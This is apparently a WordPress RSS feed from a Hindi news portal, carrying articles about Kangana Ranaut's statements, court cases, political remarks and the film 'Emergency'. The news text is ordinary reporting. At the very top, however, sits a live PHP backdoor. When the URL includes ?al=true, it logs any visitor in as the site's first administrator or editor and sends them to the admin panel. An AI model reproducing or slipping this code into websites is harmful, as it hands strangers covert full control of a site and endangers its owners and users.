// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Kangana Ranaut – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 22 May 2026 10:50:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 कंगना रनौत का वायरल वीडियो विवाद: मंगलसूत्र और चूड़ियों पर खुद दी सफाई https://pratyushaashakinayikiran.com/?p=221533 Fri, 22 May 2026 10:50:00 +0000 https://pratyushaashakinayikiran.com/?p=221533 कंगना रनौत हरी-चूड़ी और मंगलसूत्र वाला वीडियो काफी वायरल हुआ। इस पर लोगों ने तरह-तरह के कयास लगाए। अब कंगना ने इंस्टाग्राम पर पोस्ट करके बताया है कि उनके इस गेटअप के पीछे क्या राज था। उन्होंने लिखा है कि वह शूट कर रही हैं और किसी ने उन्हें कैमरे में कैप्चर कर लिया। कंगना ने लिखा है कि इस लुक में क्या ही बड़ी बात है। क्लिप्स वायरल होने के बाद उनको लोगों के फोन आने लगे हैं।

नहीं करूंगी चुपचाप शादी
कंगना रनौत ने अपने मंगलसूत्र और चूड़ी वाले लुक पर उठ रहे सवालों वाला एक न्यूज आर्टिकल शेयर किया है। इसमें लिखा है कि कंगना रनौत ने गुपचुप कर ली शादी? गले में मंगलसूत्र, हाथों में हरी चूड़ियां पहने दिखीं। इस पर कंगना ने लिखा है, ‘मैं हर दिन शूट कर रही हूं। किसी ने ये रैंडम फोटो खींच ली जिसमें मैं कैरेक्टर मेकअप में थी, अब मुझे बहुत से फोन कॉल्स आ रहे हैं। पर किसी शादीशुदा महिला के लुक में क्या बड़ी बात है। एक्टर्स हर तरह के रोल करते हैं, मैं वादा करती हूं, चुपचाप शादी नहीं करूंगी।’

चैलेंजिंग लाइफ को बताया अच्छा
एक और पोस्ट में कंगना ने लिखा है, 'न्यूज एंकर्स एसी स्टूडियोज से बाहर की हीट वेब और टेम्परेचर की शिकायत कर रहे हैं, हम जैसे लोगों का क्या जो आउटडोर शूटिंग कर रहे हैं, इतनी सारी लाइट्स, बंद जगहें, हाहा शिकायतें करना बंद कीजिए दोस्तों, जिंदगी जब तक चैलेंजिंग है, तब तक ही अच्छी है, अगर आसान और प्रिडिक्टिबल तरह से आप जीवित फील करते हैं तो यह मौत के बराबर है, हैपी समर।'

वायरल वीडियो में क्या था
कंगना का एक वीडियो वायरल हुआ था जिसमें उन्होंने पीच कलर का सलवार सूट पहना था। वह बिंदी लगाए थीं, मांग भरे थीं, गले में मंगलसूत्र और उनके हाथों में हरी चूड़ियां थीं। उनको इस गेटअप में देखकर लोग तरह-तरह के कयास लगा रहे थे। कई लोगों ने लिखा था कि कंगना को पता था कि बाहर कैमरा है, जानबूझकर ही वह ऐसे बाहर आई हैं। वो लकी इंसान कौन है जिससे उन्होंने शादी की। कुछ लोगों को लग रहा था कि कंगना ने फैशन में मंगलसूत्र पहना है। कुछ का ध्यान उनकी हरी चूड़ियों पर था। वहीं कुछ लोग यह भी लिख रहे थे कि वह शूट के लिए ऐसे तैयार हुई हैं।

कंगना के अपकमिंग प्रोजेक्ट्स
कंगना की अपकमिंग फिल्मों की बात करें तो उनकी फिल्म भारत भाग्य विधाता जून में रिलीज होनी है। वहीं क्वीन 2 की शूटिंग हो रही है। इसकी रिलीज डेट अभी ऑफिशियल नहीं हुई।

]]>
‘सनातन अनंत है’ : कंगना रनौत ने बताया धर्म का असली अर्थ https://pratyushaashakinayikiran.com/?p=205926 Wed, 18 Mar 2026 17:05:00 +0000 https://pratyushaashakinayikiran.com/?p=205926 मुंबई
 बद्रीनाथ-केदारनाथ मंदिर समिति ने हाल ही में गैर-हिंदुओं के प्रवेश को लेकर बड़ा फैसला सुनाया है। समिति के अनुसार, केदारनाथ और बद्रीनाथ समेत कई मंदिरों में गैर-सनातनियों के प्रवेश को वर्जित किया जाएगा। अब केवल वही गैर-हिंदू मंदिर में प्रवेश कर पाएंगे, जो प्रवेश से पहले सनातन धर्म में आस्था का औपचारिक शपथ पत्र जमा करते हैं, जिससे मंदिर में दर्शन की अनुमति मिलेगी। फैसले को लेकर मंदिर समिति के अध्यक्ष हेमंत द्विवेदी ने उदाहरण देते हुए अभिनेत्री सारा अली खान का नाम जोड़ा। उन्होंने कहा कि अगर सारा अली खान जैसी हस्ती भी केदारनाथ आती हैं, सनातन में अपनी आस्था जताती हैं और अगर एफिडेविट देती हैं, तो उन्हें दर्शन से नहीं रोका जाएगा। अभिनेत्री अक्सर केदारनाथ के दर्शन के लिए जाती रहती हैं। साल 2018 में उन्हें अपनी पहली फिल्म 'केदारनाथ' की शूटिंग के दौरान इस स्थान से विशेष लगाव हो गया था।

बुधवार को भाजपा सांसद और अभिनेत्री कंगना रनौत ने संसद परिसर आईएएनएस से बातचीत में कहा कि सारा को यह कहने में कोई दिक्कत नहीं होनी चाहिए क्योंकि वे भी सनातन धर्म में विश्वास रखती हैं और अगर बद्रीनाथ और केदारनाथ में दर्शन करना चाहती हैं, तो वे लिखित रूप में दें। यहां पर सभी लोग सनातनी हैं, क्योंकि जन्म से ही हम इस परंपरा से जुड़े हुए हैं।

'सनातन' का अर्थ है, जिसका न कोई आदि है और न ही अंत। कंगना ने आगे कहा कि सारे अन्य धर्म कुछ ही साल पुराने हैं, लेकिन सनातन ही सत्य है और अनादि-अनंत है, तो मुझे लगता है कि सारा को शपथ पत्र देने में कोई घबराहट नहीं होनी चाहिए। अभिनेत्री ने आगे लोकसभा के नेता विपक्ष राहुल गांधी के व्यवहार पर बयान दिया। उन्होंने कहा कि राहुल गांधी का संसद में व्यवहार अमर्यादित है। कंगना ने कहा, "वे तू-तड़ाक करके बोलते हैं। अगर कोई इंटरव्यू दे रहा हो तो अनुचित शब्द इस्तेमाल करते हैं, जो बहुत अनकम्फर्टेबल फील करवाते हैं।"

संसद पहुंचा 'सरके चुनर तेरी' सॉन्ग विवाद, अश्विनी वैष्णव बोले- गाने पर लगाया बैन
केंद्रीय मंत्री अश्विनी वैष्णव ने बुधवार को कहा कि नोरा फतेही के विवादित गाने 'सरके चुनर तेरी सरके' पर बैन लगा दिया गया है। उन्होंने जोर देकर कहा कि अभिव्यक्ति की आजादी उचित पाबंदियों के दायरे में ही होनी चाहिए, जो समाज और संस्कृति का सम्मान करती हों।

लोकसभा में बोलते हुए वैष्णव ने कहा कि अभिव्यक्ति की आजादी पूरी तरह से असीमित नहीं हो सकती। उन्होंने कहा, 'इस गाने पर बैन लगा दिया गया है। हमें बोलने की आजादी के तहत तय की गई उचित पाबंदियों के हिसाब से ही काम करना चाहिए। बोलने की आजादी पूरी तरह से असीमित नहीं हो सकती; इसे समाज और संस्कृति के संदर्भ में ही देखा जाना चाहिए।' दरअसल, यह मुद्दा निचले सदन में समाजवादी पार्टी के सांसद आनंद भदौरिया ने उठाया था। उन्होंने सरकार से इस विवादित गाने के बारे में स्पष्टीकरण मांगा था।
 
क्या है गाने पर विवाद?
इस गाने में एक्ट्रेस नोरा फतेही और संजय दत्त नजर आए थे। यह गाना आने वाली कन्नड़ फिल्म 'केडी: द डेविल' का है। ऑनलाइन रिलीज होते ही यह गाना एक बड़े विवाद में घिर गया था। कई दर्शकों ने इसके लिरिक्स को अब तक का सबसे अश्लील और इसके सीन को काफी सेक्शुअल बताते हुए इस पर आपत्ति जताई।

इस गाने का हिंदी वर्जन इसी हफ्ते की शुरुआत में यूट्यूब पर अपलोड किया गया था। गाने पर विरोध तेज होने पर इसे बाद में हटा दिया गया। हालांकि  कन्नड़, मलयालम, तेलुगु और तमिल भाषाओं वाले वर्जन अभी भी वीडियो-शेयरिंग प्लेटफॉर्म पर उपलब्ध हैं। यह फिल्म 30 अप्रैल को रिलीज होने वाली है और ये एक पैन इंडिया रिलीज है। इस गाने के ओरिजिनल लिरिक्स कन्नड़ भाषा में फिल्म के डायरेक्टर प्रेम ने लिखे थे। हिंदी वर्जन के गीतकार रकीब आलम ने इस विवाद से खुद को अलग कर लिया है। उन्होंने कहा कि उन्होंने तो बस ओरिजिनल बोलों को ट्रांसलेट किया था।

 

]]>
पीएम मोदी और NDA पर जनता का भरोसा, हर जगह लहराएगा भाजपा का परचम: कंगना रनौत https://pratyushaashakinayikiran.com/?p=205311 Mon, 16 Mar 2026 13:20:00 +0000 https://pratyushaashakinayikiran.com/?p=205311 शिमला
एनडीए के सांसदों ने असम, पश्चिम बंगाल, केरल, तमिलनाडु और केंद्र शासित प्रदेश पुडुचेरी में होने वाले विधानसभा चुनावों में जीत का दावा किया है। उन्होंने कहा कि जनता को पता है कि कौन सी सरकार इनका विकास कर सकती है, इसीलिए एनडीए को जिताएगी।

भाजपा सांसद कंगना रनौत ने चुनावी तारीखों की घोषणा के बाद कहा, "हम निश्चित रूप से जीतेंगे। सारे कार्यकर्ता इस काम में जुट गए हैं और हर जगह हम भाजपा का परचम लहराएंगे।" उन्होंने कहा कि प्रधानमंत्री नरेंद्र मोदी के नेतृत्व में देश में नई परियोजनाओं का उद्घाटन हो रहा है और जनता को भरोसा रखना चाहिए। महंगाई और एलपीजी संकट से संबंधित अफवाहों को गलत बताते हुए जनता से प्रधानमंत्री पर विश्वास रखने की अपील की।

कंगना ने कहा कि जनता विपक्ष के बहकावे में नहीं आने वाली है। जनता को एनडीए की सरकार और प्रधानमंत्री पर विश्वास है। विपक्ष को जनता के हित में सोचना चाहिए। एलपीजी आपूर्ति को लेकर केंद्रीय मंत्री सुरेश गोपी ने कहा कि सरकार इस समस्या से निपटने के लिए वैकल्पिक उपाय तलाश रही है। विपक्ष पर निशाना साधते हुए कहा कि उन्हें आलोचना करने के बजाय जनता के खाने-पीने के मामलों में सहयोग देना चाहिए।

सुरेश गोपी ने पश्चिम एशिया के मुद्दे के कारण उत्पन्न कठिनाई का हवाला देते हुए जनता से संयम और अच्छे नतीजों की प्रतीक्षा करने का आग्रह किया। पश्चिम बंगाल चुनाव की तैयारियों और प्रशासनिक निर्णयों पर केंद्रीय मंत्री सुकांत मजूमदार ने चुनाव आयोग की तारीफ की। उन्होंने कहा कि कुछ अफसर ईडी की छापेमारी में बाधा डालने का प्रयास कर रहे हैं और ऐसे अफसरों को हटाना जरूरी था।

उन्होंने पश्चिम बंगाल की मुख्यमंत्री ममता बनर्जी पर आरोप लगाया कि वह प्रशासनिक पदों का इस्तेमाल अपने राजनीतिक हित में करती हैं। भाजपा पूरी तरह तैयार है और पश्चिम बंगाल में सरकार बनाने के लक्ष्य के प्रति आश्वस्त है। केंद्रीय मंत्री रामदास आठवले ने कहा कि भाजपा इन राज्यों में उम्मीदवार उतारेगी या समर्थन देगी और उम्मीद है कि एनडीए सत्ता में आएगा। आठवले ने असम और पुडुचेरी में पुनः जीत की उम्मीद जताई और पश्चिम बंगाल, तमिलनाडु व केरल में भी अच्छे प्रदर्शन की संभावना व्यक्त की।

]]>
कोल्ड ब्लडेड मर्डर का प्लान… राजा मर्डर केस पर कंगना रनौत ने सोनम को बताया बेवकूफ औरत https://pratyushaashakinayikiran.com/?p=162660 Tue, 10 Jun 2025 08:06:00 +0000 https://pratyushaashakinayikiran.com/?p=162660  इंदौर /नई दिल्ली

 इंदौर के राजा रघुवंशी हत्याकांड में लगातार नए खुलासे सामने आ रहे हैं। इस सनसनीखेज मामले में पत्नी सोनम पर ही पूरी साजिश के आरोप लगे हैं। 23 मई से लापता सोनम करीब 17 दिन बाद यूपी के गाजीपुर से पकड़ी गई। उसने खुद पुलिस के सामने सरेंडर किया। अब मेघालय पुलिस सोनम को ट्रांजिट रिमांड पर शिलॉन्ग ले जा रही है। इस बीच पूरे मामले में बॉलीवुड अभिनेत्री और बीजेपी सांसद कंगना रनौत रिएक्ट किया है। उन्होंने राजा रघुवंशी की हत्या के मामले में सोनम को जमकर सुनाया। उन्होंने सोनम को बेवकूफ करार दिया।
सोनम रघुवंशी को कंगना ने कहा- बेवकूफ औरत

हिमाचल प्रदेश के मंडी लोकसभा सीट से सांसद कंगना रनौत अपने इंस्टाग्राम स्टोरी पर राजा और सोनम रघुवंशी की तस्वीर के साथ एक स्टोरी शेयर की। बीजेपी सांसद ने अपने नोट में इस घटना को दुर्भाग्यपूर्ण, क्रूर, जघन्य और सबसे बढ़कर बेतुका करार दिया। कंगना रनौत ने लिखा, 'यह कितना बेतुका है! महिला शादी के लिए मना नहीं कर सकती क्योंकि वह अपने ही माता-पिता से डरती है लेकिन वह सुपारी किलर के साथ एक कोल्ड ब्लडेड मर्डर का प्लान बना सकती है।'

'कितना बेतुका और बेवकूफी भरा कदम था…'

कंगना रनौत ने आगे लिखा कि यह घटना लगातार मेरे दिमाग में चल रहा है लेकिन मैं इसे समझ नहीं पा रही हूं। उफ्फ अब सिरदर्द हो रहा है। वह तलाक भी नहीं ले सकती या अपने प्रेमी के साथ भाग भी नहीं सकती। कंगना ने कहा कि कितना क्रूर, जघन्य और सबसे बढ़कर कितना बेतुका और बेवकूफी भरा कदम था। ऐसे बेवकूफ लोगों को कभी भी हल्के में नहीं लेना चाहिए। वो किसी भी समाज के लिए सबसे बड़ा खतरा हैं।

राजा रघुवंशी हत्याकांड पर बीजेपी सांसद का कमेंट

बीजेपी सांसद ने कहा कि हम अक्सर उन पर हंसते हैं और सोचते हैं कि वो नुकसान नहीं पहुंचाएंगे, लेकिन यह सच नहीं है। बुद्धिमान लोग अपने भले के लिए दूसरों को नुकसान पहुंचा सकते हैं लेकिन याद रखें कि एक बेवकूफ व्यक्ति को पता नहीं होता कि वह क्या कर रहा है। अपने आस-पास के बेवकूफों के प्रति बहुत सचेत रहें। बता दें कि 11 मई को राजा रघुवंशी और सोनम की शादी हुई थी। इसके बाद वो मेघालय हनीमून मनाने पहुंचे थे। शिलॉन्ग में हनीमून के लिए जाने का टिकट भी सोनम ने ही कराया था।

सोनम को गिरफ्तार कर शिलॉन्ग ले जा रही मेघालय पुलिस

पुलिस के अब किए गए खुलासे पर गौर करें तो राजा रघुवंशी के मर्डर की साजिश सोनम ने ही रची। इसमें उसके कथित प्रेमी राज कुशवाह के भी शामिल होने के आरोप हैं। इस मामले में सोनम ने तीन लोगों को सुपारी दी थी। पुलिस ने अब तक इस हत्याकांड में 5 लोगों की गिरफ्तारी की है। सोनम को बिहार के रास्ते शिलॉन्ग ले जाया जा रहा।

]]>
कंगना रनौत ने इंटरव्यू में प्रियंका गांधी के स्वभाव को राहुल गांधी से बेहतर बताया https://pratyushaashakinayikiran.com/?p=119226 Thu, 09 Jan 2025 15:25:00 +0000 https://pratyushaashakinayikiran.com/?p=119226 मुंबई
बॉलीवुड अभिनेत्री और भारतीय जनता पार्टी (BJP) की सांसद कंगना रनौत ने कांग्रेस नेता राहुल गांधी को भी अपनी आगामी फिल्म 'इमरजेंसी' देखने का निमंत्रण दिया है। यह फिल्म उनकी दादी और पूर्व प्रधानमंत्री इंदिरा गांधी के जीवन पर आधारित है। कंगना ने कांग्रेस सांसद प्रियंका गांधी को भी यह निमंत्रण दिया है। फिल्म 17 जनवरी को सिनेमाघरों में रिलीज होने जा रही है। इस फिल्म में कंगना खुद ही बतौर निर्देशक और एक्टर काम कर रही हैं। वह फिल्म में इंदिरा गांधी का किरदार भी निभा रही हैं।

कंगना रनौत ने इंटरव्यू में राहुल गांधी के व्यवहार की आलोचना की है। उन्होंने प्रियंका गांधी के स्वभाव को राहुल गांधी से बेहतर बताया। प्रियंका गांधी के साथ संसद में अपनी बातचीत को याद करते हुए कंगना ने कहा, "जब मैं उनसे मिली तो वह मुस्काईं और बोलीं यह हमारी बहुत प्यारी बातचीत थी। मैं बहुत अच्छे से याद करती हूं। वह बहुत शिष्ट हैं। वह अपने भाई के विपरीत हैं। वह निश्चित रूप से समझदार हैं और जो बोलती हैं, वह सही होता है। मुझे उनके साथ बात करना अच्छा लगता है।"

कंगना रनौत ने राहुल गांधी की आलोचना करते हुए कहा, "उनके भाई का तो आप जानते ही हैं। उन्होंने मुझे देखकर मुस्कान दी। उन्हें शिष्टाचार का कोई ज्ञान नहीं है। फिर भी मैं उन्हें भी फिल्म देखने का निमंत्रण देती हूं।" 'इमरजेंसी' फिल्म में अनुपम खेर, श्रेया तलपड़े, अशोक छाबड़ा, महिमा चौधरी, मिलिंद सोमण, विशाल नायर और दिवंगत सतीश कौशिक जैसे कलाकारों का प्रमुख योगदान है। यह फिल्म 1975 से 1977 तक इंदिरा गांधी द्वारा लगाए गए आपातकाल और इसके परिणामों पर आधारित है। इमरजेंसी को भारतीय लोकतंत्र में एक काले अध्याय की तरह देखा जाता है।

]]>
मध्य प्रदेश की कोर्ट ने ‘आजादी’ वाले विवादित बयान को लेकर कंगना रनौत को जारी किया नोटिस https://pratyushaashakinayikiran.com/?p=81575 Tue, 08 Oct 2024 14:16:00 +0000 https://pratyushaashakinayikiran.com/?p=81575  जबलपुर

मध्य प्रदेश (Madhya Pradesh) के जबलपुर में स्पेशल एमपी-एमएलए कोर्ट ने भारतीय जनता पार्टी (BJP) की लोकसभा सांसद कंगना रनौत को 'भारत को असली आजादी 2014 में मिली' वाले बयान पर नोटिस जारी किया है. कोर्ट ने यह नोटिस एक याचिका के बाद जारी किया है, जिसमें कंगना के बयान को चुनौती दी गई है.

स्पेशल कोर्ट के जज विश्वेश्वरी मिश्रा ने एडवोकेट अमित कुमार साहू द्वारा दायर याचिका की सुनवाई करते हुए कंगना को ये नोटिस जारी किया है. एजेंसी के मुताबिक, अमित कुमार साहू ने दावा किया कि अधारताल थाने में उनके द्वारा दर्ज कराई गई शिकायत पर कोई कार्रवाई नहीं होने के बाद 2021 में याचिका दायर की गई थी.

उन्होंने बताया, "बाद में मैंने पुलिस अधीक्षक के पास शिकायत दर्ज कराई और फिर हाईकोर्ट का रुख किया. मेरी मुख्य आपत्ति यह है कि भारत को कई स्वतंत्रता सेनानियों के बलिदान के बाद आजादी मिली, लेकिन कंगना रनौत ने कहा कि यह 'भीख' थी. उन्होंने दावा किया कि भारत को सही मायने में आजादी 2014 के बाद मिली."  

बता दें कि इस मामले की अगली सुनवाई 5 नवंबर को होगी.

कंगना रनौत ने क्या कहा था?

कगंना रनौत ने कहा था कि 1947 में तो भारत को भीख में ही आजादी दे दी गई थी. उसके बाद आई कांग्रेस सरकार भी अंग्रेजों की एक्सटेंशन रही. देश को असल आजादी 2014 के बाद मिली.

  कंगना रनौत के इस बयान के बाद बवाल खड़ा हो गया था. कांग्रेस नेता पूर्व मंत्री नसीम खान ने एक्ट्रेस पर देशद्रोह का मामला दर्ज करने की मांग उठाई थी. कंगना के बयाने के बाद मुंबई में कांग्रेस के कार्यकर्ताओं अलग-अलग जगहों पर विवादित बयान के खिलाफ प्रदर्शन भी किया था.

 

]]>
सेंसर बोर्ड से ‘इमरजेंसी’ को मिली राहत, इन बदलावों के साथ रिलीज हो सकेगी कंगना रनौत की फिल्म https://pratyushaashakinayikiran.com/?p=67749 Sun, 08 Sep 2024 16:08:00 +0000 https://pratyushaashakinayikiran.com/?p=67749 मुंबई

कंगना रनौत की अपकमिंग फिल्म 'इमरजेंसी' को सेंसर बोर्ड से बड़ी राहत मिल गई है. भारी विवाद के बीच सेंसर बोर्ड ने फिल्म को यूए सर्टिफिकेशन दे दिया है. अब 'इमरजेंसी' जल्द सिनेमाघरों में दस्तक दे सकती है लेकिन इसके लिए मेकर्स को पहले फिल्म में सीबीएफसी के सुझाए गए कट्स और बदलाव करने होंगे.

द संडे एक्सप्रेस के मुताबिक 'इमरजेंसी' को लेकर सेंसर बोर्ड तीन कट सुझाए हैं. बताया जा रहा है कि मेकर्स ने 8 जुलाई को ही सर्टिफिकेशन के लिए फिल्म को सेंसर बोर्ड में जमा किया था. इसके एक महीने बाद शिरोमणि अकाली दल और कई सिख संगठनों फिल्म पर बैन लगाने की मांग करने लगे. ऐसे में सीबीएफसी ने लेटर के जरिए फिल्म के प्रोडक्शन हाउस को 10 कट और बदलाव सुझाए थे.

फिल्म से हटाने होंगे ये विजुअल्स
'इमरजेंसी' के प्रोडक्शन हाउस मणिकर्णिका फिल्म्स प्राइवेट लिमिटेड ने सीबीएफसी के सुझाए 10 में से 9 सजेशन्स पर हामी भरी थी. सेंसर बोर्ड ने फिल्म से एक सीन में कुछ विजुअल्स को हटाने या बदलने की सलाह भी दी है. इस सीन में पाकिस्तानी सैनिकों को बांग्लादेशी शरणार्थियों पर हमला करते हुए दिखाया गया है. इसमें दिखाया गया है कि एक सैनिक एक बच्चे का सिर काट रहा है और दूसरा तीन महिलाओं का सिर काट रहा है.

इन चीजों को बदलने की भी दी गई सलाह
सीबीएफसी ने 'इमरजेंसी' के मेकर्स को फिल्म में एक नेता की मौत के जवाब में भीड़ में से किसी के अपशब्द बोलने को बदलने के लिए भी कहा था. बोर्ड ने फिल्म में एक डायलॉग में इस्तेमाल किए गए सरनेम को बदलने का भी निर्देश दिया था. इसके अलावा सीबीएफसी ने फिल्म में दिखाए गए रिसर्च रिफ्रेंस और डेटा के लिए फैक्चुअल सोर्स के बारे में बताने की भी सलाह दी है. इसमें बांग्लादेशी शरणार्थियों की जानकारी, अदालती फैसलों की डिटेल और 'ऑपरेशन ब्लूस्टार' के आर्काइवल फुटेज के इस्तेमाल किए जाने की इजाजत शामिल है.

जल्द सामने आ सकती है 'इमरजेंसी' की नई रिलीज डेट
बता दें कि कंगना रनौत की 'इमरजेंसी' पहले 6 सितंबर को रिलीज होने वाली थी. लेकिन फिल्म को लेकर हुए हंगामे के बाद इसे सेंसर बोर्ड से सर्टिफिकेशन नहीं मिला और रिलीज टल गई. अब सेंसर बोर्ड से क्लियरेंस मिलने के बाद उम्मीद है कि मेकर्स जल्द ही 'इमरजेंसी' की नई रिलीज डेट अनाउंस होगी.

कंगना की ‘इमरजेंसी’ को मिली हरी झंडी

सेंट्रल बोर्ड ऑफ फिल्म सर्टिफिकेशन ने कंगना की फिल्म ‘इमरजेंसी’ के निर्माताओं से विवादित ऐतिहासिक बयानों का सोर्स मांगा है, जिनमें पूर्व राष्ट्रपति रिचर्ड निक्सन द्वारा भारतीय महिलाओं के बारे में की गई अपमानजनक टिप्पणी और विंस्टन चर्चिल द्वारा भारतीयों को 'खरगोशों की तरह प्रजनन करने वाले' कहने वाली टिप्पणी भी शामिल हैं. निर्माताओं को इन दोनों बयानों का सार्स CBFC को देना होगा. मेकर्स ने जुलाई में फिल्म को सर्टिफिकेशन के लिए जमा किया था और 8 अगस्त को सीबीएफसी ने फिल्म में 3 कट और 10 बदलाव करने को कहा था.

3 कट और 10 बदलाव के बाद रिलीज होगी फिल्म

सीबीएफसी ने मणिकर्णिका फिल्म्स प्राइवेट लिमिटेड को खत भेजकर ‘यूए’ सर्टिफिकेट के लिए 10 जरूरी बदलावों की लिस्ट दी थी. बोर्ड ने सुझाव दिया कि फिल्म के उस सीन को हटा या बदल दिया जाए, जिसमें पाकिस्तानी सैनिक बांग्लादेशी शरणार्थियों पर हमला करते हैं. खासकर जहां एक सैनिक एक नवजात बच्चे और तीन महिलाओं के सिर काट देता है. सीबीएफसी के 8 अगस्त के पत्र के बाद, सूत्रों के मुताबिक, फिल्म निर्माताओं ने 14 अगस्त को जवाब दिया और उसी दिन फिल्म का ट्रेलर भी रिलीज किया गया. बताया जा रहा है कि फिल्ममेकर्स ने एक कट को छोड़कर बाकी सभी बदलावों पर सहमति दे दी है.

18 सितंबर तक होगा सर्टिफिकेट पर फैसला

29 अगस्त को फिल्म निर्माताओं को एक ईमेल मिला जिसमें कहा गया कि उनकी फिल्म को ‘UA’ सर्टिफिकेट मिल गया है, लेकिन असल में कोई सर्टिफिकेट जारी नहीं किया गया. सर्टिफिकेट न मिलने के बाद 'इमरजेंसी' फिल्म के मेकर्स ने बॉम्बे हाई कोर्ट का दरवाजा खटखटाया. कोर्ट में, सीबीएफसी के वकील ने बताया कि फिल्म निर्माताओं की 14 अगस्त की प्रतिक्रिया के रिव्यू के लिए एक नई बैठक अभी तक नहीं बुलाई गई है. इसलिए सर्टिफिकेट नहीं मिल पाया. बॉम्बे हाई कोर्ट ने सीबीएफसी को 18 सितंबर तक सर्टिफिकेट पर फैसला लेने का समय दिया है. 

]]>
भारत भाग्य विधाता में काम करेंगी कंगना रनौत https://pratyushaashakinayikiran.com/?p=65956 Wed, 04 Sep 2024 10:35:00 +0000 https://pratyushaashakinayikiran.com/?p=65956 मुंबई
 बॉलीवुड की जानीमानी अभिनेत्री कंगना रनौत फ़िल्म भारत भाग्य विधाता में काम करती नज़र आयेंगी। हिंदी फिल्म इंडस्ट्री में एक महत्वपूर्ण कदम उठाते हुए, दो क्रिएटिव माइंडस, बबीता आशिवाल और आदि शर्मा, टॉप लेवल का क्वालिटी कंटेंट देने के लिए एक साथ आए हैं, जो दिलों को छूने का वादा करता है। उनके नये वेंचर, जिसका टाइटल "भारत भाग्य विधाता" है, उनके संबंधित प्रोडक्शन हाउस, यूनोइया फिल्म्स और फ्लोटिंग रॉक्स एंटरटेनमेंट के पहले सहयोग के तहत एक प्रमुख प्रयास है।

बबीता और आदि का पूरा विश्वास है कि "क्वॉलिटी कंटेंट को मास अपील से अधिक महत्व दिया जाता है।" जैसा कि नाम से पता चलता है, "भारत भाग्य विधाता" उन लोगों पर केंद्रित है जिनके बिना देश का काम करना बंद हो जाएगा। फिल्म का उद्देश्य उन आम लोगों के अमूल्य योगदान को उजागर करना है जो पर्दे के पीछे अथक परिश्रम करते हैं।इस फ़िल्म में मुख्य भूमिका में कंगना रनौत नज़र आयेंगी।यह फ़िल्म मनोज तापड़िया द्वारा निर्देशित और लिखित है।

बबीता आशीवाल ने कहा, भारत भाग्य विधाता एक दृष्टिगत रूप से आश्चर्यजनक और भावनात्मक रूप से समृद्ध फिल्म होने का वादा करती है। इस प्रोजेक्ट पर काम करना अविश्वसनीय रूप से फायदेमंद रहा है। हमारा लक्ष्य ऐसी कंटेंट बनाना है जो हमारे दर्शकों को आकर्षित करे। हमें पूरा विश्वास है कि कंगना का साथ मिलकर यह फिल्म लोगों का दिल जीत लेगी।

आदि शर्मा ने कहा, हाई क्वालिटी वाली, विचारोत्तेजक फिल्में भारतीय सिनेमा का भविष्य हैं। कंगना के साथ इस फिल्म पर हमारा सहयोग ऐसी विषय-वस्तु बनाने पर केंद्रित है जो सीमाओं से परे हो और दर्शकों से गहरे भावनात्मक स्तर पर जुड़े।हाई कंटेंट वाली फिल्में वास्तव में ब्लॉकबस्टर सफलताओं का भविष्य हैं।

 

]]>
कंगना रनौत को अपने लिये प्रेरणा मानते हैं श्रेयस तलपड़े https://pratyushaashakinayikiran.com/?p=61256 Sat, 17 Aug 2024 10:26:00 +0000 https://pratyushaashakinayikiran.com/?p=61256 मुंबई
बॉलीवुड अभिनेता श्रेयस तलपड़े अभिनेत्री कंगना रनौत को अपने लिये बड़ी प्रेरणा मानते हैं। श्रेयस तलपड़े ने फिल्म इमरजेंसी में पूर्व प्रधानमंत्री दिवंगत अटल बिहारी वाजपेयी का किरदार निभाया है। फिल्म इमरजेंसी का ट्रेलर हाल ही में लांच किया गया है। इमरजेंसी के ट्रेलर लांच पर श्रेयस तलपड़े ने कंगना रनौत की तारीफ की है।

श्रेयस तलपड़े ने कहा, जब कंगना ने मुझे अटल बिहारी वाजपेयी की भूमिका के लिए संपर्क किया तो मुझे नहीं पता था कि कैसे प्रतिक्रिया दूं। मैं उलझन में था और घबराया हुआ था, मैं सोच रहा था कि उन्होंने मुझसे क्या करने के लिए कहा है? क्या मुझे यह भूमिका निभानी चाहिए या छोड़ देनी चाहिए? कंगना मेरे लिये बहुत बड़ी प्रेरणा हैं। हमने ज्यादातर कंगना को एक अभिनेत्री के रूप में काम करते देखा है, लेकिन जब मैं इमरजेंसी के सेट पर गया, तो जिस तरह से उन्होंने खुद को फिल्म के लिए तैयार किया था, वह अद्भुत था। कंगना ने न सिर्फ अपने हिस्से के लिए ही नहीं, बल्कि अटल जी के हिस्से के लिए भी होमवर्क किया। फिल्म के एक सीन के लिए मैं रिहर्सल कर रहा था। टेक के दौरान मैंने अपनी तरफ से कुछ एक्स्ट्रा डालने की कोशिश की, लेकिन कंगना आईं और मेरे कान में कहा कि रिहर्सल में जो आप कर रहे थे वही करिये।

श्रेयस तलपड़े ने कहा, कंगना बेहद शानदार शख्सियत हैं। कंगना ने मुझे छोटी-छोटी चीजें मुझे बतायी। मैंन उनसे बहुत कुछ सीखा। यदि कंगना नहीं होतीं, तो मेरे लिये अटल जी की भूमिका निभाना आसान नहीं होता। फिल्म इमरजेंसी अंतर्राष्ट्रीय स्तर पर बनायी गयी फिल्म हैं। फिल्म इमरजेंसी का हिस्सा बनकर बेहद खुश और गौरान्वित महसूस कर रहा हूं। 1975 में इमरजेंसी और शोले जैसी महत्वपूर्ण घटना हुयी। शोले के बारे में लोग जानते हैं, इमरजेंसी के बारे में बहुत लोग नहीं जानते हैं। इमरजेंसी के दौरान क्या सिचुयेशन थी। लीडर्स का क्या रवैया था। इमरजेंसी के बारे में लोगों को जानना जरूरी है।

